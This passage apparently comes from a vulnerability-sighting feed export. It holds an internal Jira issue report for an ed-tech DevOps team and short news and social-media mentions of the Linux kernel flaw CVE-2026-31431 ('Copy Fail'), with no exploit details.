}\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 05, 2026 at 10:29 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n4\n\nIM \u2014 Incident Management\n5\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 4\n                    \n\n                      DO-2046\n                      Alamance, NC - Please turn on User Defined Reports\n                      JD Hawk\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      On hold\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                5 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 4\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n1\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 1\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 4, '26\n                      May 4, '26\n                      Backlog\n                    \n\n\n\nDO \u2014 Edulog DevOps\n9\n\nIM \u2014 Incident Management\n15\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                9 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 6\n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                15 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 15\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7547\n                      Rochambeau, MD - Busses 203/204 have not had movement in Parent Porta Lite since 7:30 PM on 4/27\n                      Josiah Brown\n                      Apr 29, '26\n                      May 4, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-2005\n                      Staging-epic-FR3-eks: Bell Time task creation throws ERROR_LOADING_CONTEXT\n                      Vader\n                      Apr 27, '26\n                      Apr 27, '26 (6d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (29d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (37d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (27d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (25d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 05, 2026 at 10:29 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-05T22:29:46.000000Z"}, {"uuid": "6e700d40-a13c-4f8e-9548-e387e733ce7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3ml5cmub6ma2m", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://lobste.rs/s/cvmqdt #security #linux ", "creation_timestamp": "2026-05-05T23:10:04.693912Z"}, {"uuid": "e14cf3da-9d42-4d0c-907e-19bb4ceced91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3ml5eurlg362r", "content": "Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/", "creation_timestamp": "2026-05-05T23:50:16.723849Z"}, {"uuid": "28d36022-21ed-4b66-bd3f-cae2abd7445a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/", "content": "Copy Fail (CVE-2026-31431) is a critical Linux kernel LPE that allows stealthy root access. This flaw impacts millions of systems. Read our analysis. The post Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years appeared first on Unit 42.", "creation_timestamp": "2026-05-05T21:00:33.000000Z"}, {"uuid": "25e338b1-1974-42c0-a918-972c1e59a7d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3ml5liblfaq32", "content": "Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years Copy Fail (CVE-2026-31431) is a critical Linux kernel LPE that allows stealthy root access. This flaw impacts millions o...\n\n#High #Profile #Threats #Vulnerabilities [\u2026] \n\n[Original post on unit42.paloaltonetworks.com]", "creation_timestamp": "2026-05-06T01:48:36.613161Z"}, {"uuid": "95437b5a-99fb-4000-b519-094db6921f52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3ml5nsllfhs2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 561 interactions\nCVE-2026-41940: 122 interactions\nCVE-2026-3854: 42 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-41940: 40 interactions\nCVE-2026-31431: 21 interactions\nCVE-2026-23918: 12 interactions\n", "creation_timestamp": "2026-05-06T02:30:08.214164Z"}, {"uuid": "1dfa55bf-2d61-4572-9fef-f205174792e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Enkhsanaa/3dced2c7e31abcf1deac2dbb9674428c", "content": "", "creation_timestamp": "2026-05-06T03:15:36.000000Z"}, {"uuid": "c494a8c1-8093-4695-8274-4b5ed16a0836", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3ml5sknsj6j2y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\n\u300cLinux\u300d\u306b\u6975\u3081\u3066\u91cd\u5927\u306a\u8106\u5f31\u6027--\u300cCopy Fail\u300d\u767a\u899a\n\n\u5370\u5237\u3059\u308b \u30e1\u30fc\u30eb\u3067\u9001\u308b \u30c6\u30ad\u30b9\u30c8 HTML \u96fb\u5b50\u66f8\u7c4d PDF \u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 \u30c6\u30ad\u30b9\u30c8 \u96fb\u5b50\u66f8\u7c4d PDF \u30af\u30ea\u30c3\u30d7\u3057\u305f\u8a18\u4e8b\u3092My\u30da\u30fc\u30b8\u304b\u3089\u8aad\u3080\u3053\u3068\u304c\u3067\u304d\u307e\u3059 \u300cCopy Fail\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u300cCVE-2026-31431\u300d\u306f\u30012017\u5e74\u304b\u3089\u6f5c\u4f0f\u3057\u3066\u3044\u305f\u300cLinux\u300d\u30ab\u30fc\u30cd\u30eb\u306e\u6df1\u523b\u306a\u8106\u5f31\uff08\u305c\u3044\u3058\u3083\u304f\uff09\u6027\u3067\u3042\u308a\u3001\u73fe\u5728\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u5927\u304d\u306a\u6ce8\u76ee\u3092\u96c6\u3081\u3066\u3044...\nhttps://japan.zdnet.com/article/35247165/", "creation_timestamp": "2026-05-06T03:55:10.303400Z"}, {"uuid": "21d70a98-aa46-4e6b-b143-b417dc725a17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3ml5spvsvdz2p", "content": "\ud83d\udd34 Kernel \u6f0f\u6d1e\u53ef\u5bfc\u81f4\u672c\u5730\u63d0\u6743\uff1b\u8bf7\u5c3d\u5feb\u4fee\u590d\u6216 mitigate\u3002\n\n- \u6f0f\u6d1e\u4e0e kernel crypto API \u76f8\u5173\u3002\u5f71\u54cd 4.14 